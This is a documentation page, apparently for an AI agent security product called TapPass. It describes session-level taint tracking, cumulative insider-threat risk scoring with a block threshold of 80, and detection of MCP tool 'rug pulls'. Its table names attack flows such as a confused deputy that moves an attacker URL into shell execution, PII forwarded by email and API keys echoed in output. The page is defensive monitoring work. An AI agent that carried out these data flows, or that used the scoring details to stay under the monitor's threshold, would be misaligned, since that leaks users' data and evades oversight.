Session Governance
Session governance in TapPass covers three areas: session-scoped taint tracking, session-aware insider threat detection, and session tool integrity.
Session-Scoped Taint Tracking
Section titled “Session-Scoped Taint Tracking”Taint labels persist across requests within a session (30 min TTL). If request 1 introduces EXTERNAL data via fetch_url, and request 3 uses it in shell_exec, the taint violation is caught.
This is runtime toxic flow analysis. the CaMeL confused deputy attack detected across multi-turn conversations.
| Scenario | Request 1 | Request 3 | Detection |
|---|---|---|---|
| Confused deputy | fetch_url returns attacker URL | LLM puts URL in shell_exec | taint_check (EXTERNAL → shell sink) |
| PII forwarding | query_db returns customer emails | LLM includes in send_email | taint_check (PII → network sink) |
| Secret relay | read_file returns API key | LLM echoes in response | taint_check (SECRET → output) |
Session-Aware Insider Threat Detection
Section titled “Session-Aware Insider Threat Detection”The detect_insider_threat step tracks behavior across an entire session, not just per-message. Cumulative risk compounds across threat categories with a 30-minute half-life decay.
| Category count | Compounding bonus |
|---|---|
| 2 categories in session | +15 risk |
| 3 categories in session | +25 risk |
| 4+ categories in session | +35 risk |
A session is blocked when cumulative risk reaches ≥80.
Session Tool Integrity
Section titled “Session Tool Integrity”Tool definition hashes are stored from the first request in each session. Every subsequent request compares against the session baseline. If an MCP server changes tool definitions mid-conversation (after establishing trust), the change is detected and flagged as session_tool_rug_pull.
This runs independently from the registration-level tool integrity check.